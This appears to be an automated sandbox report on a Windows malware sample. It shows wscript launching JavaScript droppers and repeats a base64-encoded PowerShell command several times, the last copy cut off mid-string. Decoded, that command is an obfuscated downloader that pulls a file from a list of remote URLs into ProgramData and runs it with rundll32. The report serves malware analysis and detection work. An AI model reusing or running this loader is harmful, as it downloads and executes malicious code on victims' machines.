Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 25, 2023, 11:04 a.m. | May 25, 2023, 11:06 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\GuessableInapti.js
3044-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\stalerImmigrator.js" KickoffMaldocchio Aggregates
1228-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="
240
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA=" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0A